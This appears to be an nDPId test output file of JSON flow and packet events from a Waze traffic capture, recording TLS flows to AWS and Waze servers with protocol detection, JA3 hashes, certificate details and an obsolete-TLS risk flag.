-00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878215,"flow_last_seen":1435587878215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1435587878215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878215,"pkt":"ABoRAAACABoRAAABCABFAAA8EZdAAEAGeDAKCAABNBFy25htAbtopH5VAAAAAKAC\/\/+mHQAAAgQFtAQCCAoACG\/CAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1435587878217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAodRhAABAGRMM0EXLbCggAAQG7mG2XW4GqaKR+VlAS\/\/9ktAAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1435587878217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878217,"pkt":"ABoRAAACABoRAAABCABFAAAoEZhAAEAGeEMKCAABNBFy25htAbtopH5Wl1uBq1AQ\/\/9ktQAA"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878606,"flow_last_seen":1435587878606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587878606,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1435587878606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587878606,"pkt":"ABoRAAACABoRAAABCABFAAA8DkFAAEAGt5sKCAABsCK6tI3YAbvsnGGoAAAAAKAC\/\/+FVQAAAgQFtAQCCAoACG\/pAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1435587878608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878608,"pkt":"ABoRAAACABoRAAABCABFAAAodR5AABAGgNKwIrq0CggAAQG7jdgTY55X7JxhqVAS\/\/+rXgAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1435587878609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878609,"pkt":"ABoRAAACABoRAAABCABFAAAoDkJAAEAGt64KCAABsCK6tI3YAbvsnGGpE2OeWFAQ\/\/+rXwAA"} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01253{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879018,"flow_last_seen":1435587879018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879018,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1435587879018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879018,"pkt":"ABoRAAACABoRAAABCABFAAA8CjxAAEAGu6AKCAABsCK6tI3aAbtwD3ouAAAAAKAC\/\/\/pMQAAAgQFtAQCCAoACHASAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1435587879020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAodSNAABAGgM2wIrq0CggAAQG7jdqP8IXRcA96L1AS\/\/+rXAAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1435587879020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAoCj1AAEAGu7MKCAABsCK6tI3aAbtwD3ovj\/CF0lAQ\/\/+rXQAA"} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879850,"flow_last_seen":1435587879850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879850,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1435587879850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879850,"pkt":"ABoRAAACABoRAAABCABFAAA8Fw9AAEAGrs0KCAABsCK6tI3cAbueIGdrAAAAAKAC\/\/\/NjwAAAgQFtAQCCAoACHBkAAAAAAEDAwg="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1435587879852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879852,"pkt":"ABoRAAACABoRAAABCABFAAAodS5AABAGgMKwIrq0CggAAQG7jdxh35iUniBnbFAS\/\/+rWgAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1435587879853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879853,"pkt":"ABoRAAACABoRAAABCABFAAAoFxBAAEAGruAKCAABsCK6tI3cAbueIGdsYd+YlVAQ\/\/+rWwAA"} -01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880576,"flow_last_seen":1435587880576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880576,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1435587880576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880576,"pkt":"ABoRAAACABoRAAABCABFAAA0U4FAAEAG6tYKECWdyKAEH6vXAFAtnZBdDlnt+YARAVu2DAAAAQEICgAIcK6K\/GDA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUFAABAG+SLIoAQfChAlnQBQq9cOWe35LZ2QXlAQ\/\/9M8gAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUJAABAG+SHIoAQfChAlnQBQq9cOWe35LZ2QXlAR\/\/9M8QAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880577,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880577,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1435587880577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAA0OqdAAEAGA58KECWdyKAEMbWJAFDzNuhArgf0IIARAVuhgQAAAQEICgAIcK4TbB\/F"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodUNAABAG+Q7IoAQxChAlnQBQtYmuB\/Qg8zboQVAQ\/\/9\/2wAA"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodURAABAG+Q3IoAQxChAlnQBQtYmuB\/Qg8zboQVAR\/\/9\/2gAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880578,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880578,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1435587880578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAA04rRAAEAGW5EKECWdyKAEMaNfAFDGgz5oQX0A9YARAVvp7QAAAQEICgAIcK4TbB\/F"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUVAABAG+QzIoAQxChAlnQBQo19BfQD1xoM+aVAQ\/\/\/IRwAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1435587880579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUZAABAG+QvIoAQxChAlnQBQo19BfQD1xoM+aVAR\/\/\/IRgAA"} 